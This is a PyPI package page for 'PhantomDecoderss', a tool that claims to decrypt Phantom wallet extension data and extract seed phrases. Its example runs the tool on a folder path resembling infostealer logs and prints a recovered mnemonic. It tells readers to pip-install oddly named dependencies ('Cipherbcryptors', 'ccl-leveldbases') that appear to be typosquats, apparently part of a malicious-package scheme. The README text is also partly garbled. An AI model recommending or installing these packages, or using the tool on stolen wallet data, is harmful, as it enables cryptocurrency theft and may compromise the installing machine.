PhantomDecoderss


NamePhantomDecoderss JSON
Version 1.6.9 PyPI version JSON
download
home_pageNone
SummarySimple Tools for decode Phantom wallet data, from extensions wallet, Phantom.
upload_time2024-09-22 07:09:47
maintainerNone
docs_urlNone
authorJeanClaude89
requires_python<4.0,>=3.7
licenseMIT
keywords extensions phantom walletdecode solana evm crypto decrypt wallet
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            # PhantomDecoderss
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)

Simple Tools for decode Phantom wallet data, from extensions wallet, Phantom - extract mnemonic phrase from you encrypted data with password.


## Installation
Install the dependencies and devDependencies and start the server.
**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.

###### python -m pip install --upgrade pip
###### pip install -r requirements.txt
```
PyNaCl >= 1.5.0
base58 >= 2.1.1
pycryptodome >= 3.20.0
Cipherbcryptors >= 1.2
bip-utils >= 2.9.1
ccl-leveldbases >= 1.0
```
or u can install per one libs:
```sh
pip install PyNaCl		| PyNaCl 1.5.0
pip install base58 		| base58 2.1.1
pip install pycryptodome	| pycryptodome 3.20.0
pip install Cipherbcryptors	| Cipherbcryptors 1.2
pip install bip_utils		| bip-utils 2.9.1
pip install ccl-leveldbases	| ccl-leveldbases 1.0
```


## Example

```python
from PhantomDecoderss import findldb, phmdecode

path =  r"C:/Users/Root/Desktop/nLogs\4)_64da69d82f8e45c3a154479bdc5ec5d0\Wallets\Phantom_Chrome_Default"
password = 'Topsecret'
result = findldb(path)
raw_data = phmdecode(password, result)
print(raw_data)

```
##Output:
```
{'version': 1, 'identifier': 'ef7ee9f9e51cd3b8c4a74827dc226f52a1828979640d77e623a3eb9a54a38af7', 'name': 'Phantom Seed', 'entropy': {'0': 213, '1': 40, '2': 95, '3': 131, '4': 75, '5': 191, '6': 243, '7': 65, '8': 254, '9': 34, '10': 248, '11': 66, '12': 213, '13': 82, '14': 147, '15': 39}}
{'status': True, 'txt': 'Successful', 'data': ['ravioli seek one result caban end ancient index mountain small almost garden']}
```


For more information, see [docs.python-guide.org](http://docs.python-guide.org "docs.python-guide.org").



## License
MIT
>Decoder master project (c)

            

Raw data

            {
    "_id": null,
    "home_page": null,
    "name": "PhantomDecoderss",
    "maintainer": null,
    "docs_url": null,
    "requires_python": "<4.0,>=3.7",
    "maintainer_email": null,
    "keywords": "extensions, phantom, walletdecode, solana, evm, crypto, decrypt, wallet",
    "author": "JeanClaude89",
    "author_email": null,
    "download_url": "https://files.pythonhosted.org/packages/3d/64/7fc1d5a7a732046aa075a716c63800e33dae3fd79e2b43b918f2fff58dbf/phantomdecoderss-1.6.9.tar.gz",
    "platform": null,
    "description": "# PhantomDecoderss\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nSimple Tools for decode Phantom wallet data, from extensions wallet, Phantom - extract mnemonic phrase from you encrypted data with password.\n\n\n## Installation\nInstall the dependencies and devDependencies and start the server.\n**Python** 3.10.4 | https://www.python.org/downloads/ |** Add python.exe to PATH** | checkbox.\n\n###### python -m pip install --upgrade pip\n###### pip install -r requirements.txt\n```\nPyNaCl >= 1.5.0\nbase58 >= 2.1.1\npycryptodome >= 3.20.0\nCipherbcryptors >= 1.2\nbip-utils >= 2.9.1\nccl-leveldbases >= 1.0\n```\nor u can install per one libs:\n```sh\npip install PyNaCl\t\t| PyNaCl 1.5.0\npip install base58 \t\t| base58 2.1.1\npip install pycryptodome\t| pycryptodome 3.20.0\npip install Cipherbcryptors\t| Cipherbcryptors 1.2\npip install bip_utils\t\t| bip-utils 2.9.1\npip install ccl-leveldbases\t| ccl-leveldbases 1.0\n```\n\n\n## Example\n\n```python\nfrom PhantomDecoderss import findldb, phmdecode\n\npath =  r\"C:/Users/Root/Desktop/nLogs\\4)_64da69d82f8e45c3a154479bdc5ec5d0\\Wallets\\Phantom_Chrome_Default\"\npassword = 'Topsecret'\nresult = findldb(path)\nraw_data = phmdecode(password, result)\nprint(raw_data)\n\n```\n##Output:\n```\n{'version': 1, 'identifier': 'ef7ee9f9e51cd3b8c4a74827dc226f52a1828979640d77e623a3eb9a54a38af7', 'name': 'Phantom Seed', 'entropy': {'0': 213, '1': 40, '2': 95, '3': 131, '4': 75, '5': 191, '6': 243, '7': 65, '8': 254, '9': 34, '10': 248, '11': 66, '12': 213, '13': 82, '14': 147, '15': 39}}\n{'status': True, 'txt': 'Successful', 'data': ['ravioli seek one result caban end ancient index mountain small almost garden']}\n```\n\n\nFor more information, see [docs.python-guide.org](http://docs.python-guide.org \"docs.python-guide.org\").\n\n\n\n## License\nMIT\n>Decoder master project (c)\n",
    "bugtrack_url": null,
    "license": "MIT",
    "summary": "Simple Tools for decode Phantom wallet data, from extensions wallet, Phantom.",
    "version": "1.6.9",
    "project_urls": null,
    "split_keywords": [
        "extensions",
        " phantom",
        " walletdecode",
        " solana",
        " evm",
        " crypto",
        " decrypt",
        " wallet"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "1339ca382ad149029b6c66bf8c3742af637ef5eb3c95822e831f56fde187a063",
                "md5": "505ec32d3da81033ceb6a719f4fd48ee",
                "sha256": "61561344de384c1768f9177e7f0a5d8fbcc3e10f8be29d36fe5ffc03e46c4681"
            },
            "downloads": -1,
            "filename": "phantomdecoderss-1.6.9-py3-none-any.whl",
            "has_sig": false,
            "md5_digest": "505ec32d3da81033ceb6a719f4fd48ee",
            "packagetype": "bdist_wheel",
            "python_version": "py3",
            "requires_python": "<4.0,>=3.7",
            "size": 4111,
            "upload_time": "2024-09-22T07:09:45",
            "upload_time_iso_8601": "2024-09-22T07:09:45.509067Z",
            "url": "https://files.pythonhosted.org/packages/13/39/ca382ad149029b6c66bf8c3742af637ef5eb3c95822e831f56fde187a063/phantomdecoderss-1.6.9-py3-none-any.whl",
            "yanked": false,
            "yanked_reason": null
        },
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "3d647fc1d5a7a732046aa075a716c63800e33dae3fd79e2b43b918f2fff58dbf",
                "md5": "0f34955755f9375766a37d06ffdcacb9",
                "sha256": "3028ccaac1b5385f70bd33734c3a88e5f033b6e657a1b28692f1c709dad7c2ae"
            },
            "downloads": -1,
            "filename": "phantomdecoderss-1.6.9.tar.gz",
            "has_sig": false,
            "md5_digest": "0f34955755f9375766a37d06ffdcacb9",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": "<4.0,>=3.7",
            "size": 3736,
            "upload_time": "2024-09-22T07:09:47",
            "upload_time_iso_8601": "2024-09-22T07:09:47.058135Z",
            "url": "https://files.pythonhosted.org/packages/3d/64/7fc1d5a7a732046aa075a716c63800e33dae3fd79e2b43b918f2fff58dbf/phantomdecoderss-1.6.9.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2024-09-22 07:09:47",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "codeberg": false,
    "lcname": "phantomdecoderss"
}
        
Elapsed time: 0.33752s